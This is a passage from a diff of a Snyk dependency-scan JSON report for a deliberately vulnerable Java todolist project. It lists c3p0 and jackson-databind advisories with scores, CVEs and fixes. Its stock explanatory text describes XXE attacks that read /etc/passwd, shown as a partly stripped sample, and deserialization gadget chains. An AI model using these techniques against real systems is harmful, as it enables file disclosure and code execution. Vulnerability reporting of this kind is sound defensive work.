"pin": {} - }, - "filesystemPolicy": false, - "filtered": { - "ignore": [], - "patch": [] - }, - "uniqueCount": 22, - "projectName": "io.github.snyk:todolist-core", - "foundProjectCount": 7, - "displayTargetFile": "todolist-goof/todolist-core/pom.xml", - "hasUnknownVersions": false, - "path": "/Users/austindoll/Documents/GitHub/java-goof" - }, - { - "vulnerabilities": [ - { - "id": "SNYK-JAVA-C3P0-461017", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", - "className": "C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "c3p0:c3p0", - "references": [ - { - "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", - "title": "GitHub Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:06.803024Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:48:09.230623Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:45.369849Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:06.803024Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:09.230623Z" - } - ], - "description": "## Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", - "epssDetails": { - "percentile": "0.78365", - "probability": "0.00585", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-20433" - ], - "CWE": [ - "CWE-611" - ] - }, - "packageName": "c3p0:c3p0", - "proprietary": false, - "creationTime": "2019-09-05T16:17:58.383761Z", - "functions_new": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-12-24T13:29:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "c3p0", - "artifactId": "c3p0" - }, - "publicationTime": "2019-07-21T14:22:18Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:09.230623Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2" - }, - { - "id": "SNYK-JAVA-C3P0-461018", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", - "className": "C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "c3p0:c3p0", - "references": [ - { - "url": "https://hackerone.com/reports/509315", - "title": "POC: Hackerone Report" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:48:38.831457Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 4.4, - "modificationTime": "2024-03-11T09:48:53.496388Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:02:14.895852Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.831457Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.4, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:53.496388Z" - } - ], - "description": "## Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", - "epssDetails": { - "percentile": "0.90102", - "probability": "0.02457", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-5427" - ], - "CWE": [ - "CWE-776" - ], - "GHSA": [ - "GHSA-84p2-vf58-xhxv" - ] - }, - "packageName": "c3p0:c3p0", - "proprietary": false, - "creationTime": "2019-09-05T16:24:58.914446Z", - "functions_new": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-04-22T22:18:26Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "c3p0", - "artifactId": "c3p0" - }, - "publicationTime": "2019-04-22T22:18:26Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:53.496388Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2" - }, - { - "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", - "type": "license", - "title": "LGPL-3.0 license", - "semver": { - "vulnerable": [ - "[0,)" - ] - }, - "license": "LGPL-3.0", - "language": "java", - "description": "LGPL-3.0 license", - "packageName": "c3p0:c3p0", - "creationTime": "2024-06-18T02:35:42.971Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T02:35:42.971Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.6)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2798", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:47.492797Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.721313Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:03.263794Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:47.492797Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.721313Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `com.pastdev.httpcomponents.configuration.JndiConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2798)\n", - "epssDetails": { - "percentile": "0.77013", - "probability": "0.00519", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-24750" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-09-18T13:46:28.613692Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-09-18T13:44:12Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-09-18T16:19:32Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.721313Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Srikanth Ramu", - "threedr3am'follower" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2658", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/pull/2864%23issuecomment-701026600", - "title": "GitHub PR" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:52:55.201119Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:02:44.942188Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:55.201119Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to the class `ignite-jta`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2658)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/2864#issuecomment-701026600)\n", - "epssDetails": { - "percentile": "0.75677", - "probability": "0.00464", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10650" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-11-29T12:43:11.601162Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-09-29T22:30:33Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-11-29T15:58:07.317638Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:52:55.201119Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", - "credit": [ - "Bartosz Baranowski" - ], - "semver": { - "vulnerable": [ - "[2.6.0,2.6.7.4)", - "[2.9.0,2.9.10.7)", - "[2.10.0, 2.10.5.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.6.7.4", - "2.9.10.7", - "2.10.5.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.2, - "functions": [ - { - "version": [ - "[2.6.0,2.6.7.4)", - "[2.9.0,2.9.10.7)", - "[2.10.0, 2.10.5.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ext/DOMSerializer.java", - "className": "DOMSerializer", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2589", - "title": "GitHub Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1887664", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", - "cvssV3BaseScore": 5.8, - "modificationTime": "2024-03-11T09:49:41.313444Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:50:46.628614Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:51:14.249736Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.2, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:03:31.367594Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", - "assigner": "SUSE", - "severity": "medium", - "baseScore": 5.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:41.313444Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:46.628614Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:14.249736Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. A flaw was found in FasterXML Jackson Databind, where it does not have entity expansion secured properly in the `DOMDeserializer` class. The highest threat from this vulnerability is data integrity.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.7, 2.10.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2589)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1887664)\n", - "epssDetails": { - "percentile": "0.68432", - "probability": "0.00275", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-25649" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-288c-cq4h-88gq" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-12-04T11:58:40.054903Z", - "functions_new": [ - { - "version": [ - "[2.6.0,2.6.7.4)", - "[2.9.0,2.9.10.7)", - "[2.10.0, 2.10.5.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ext.DOMSerializer", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-12-04T11:54:03Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" 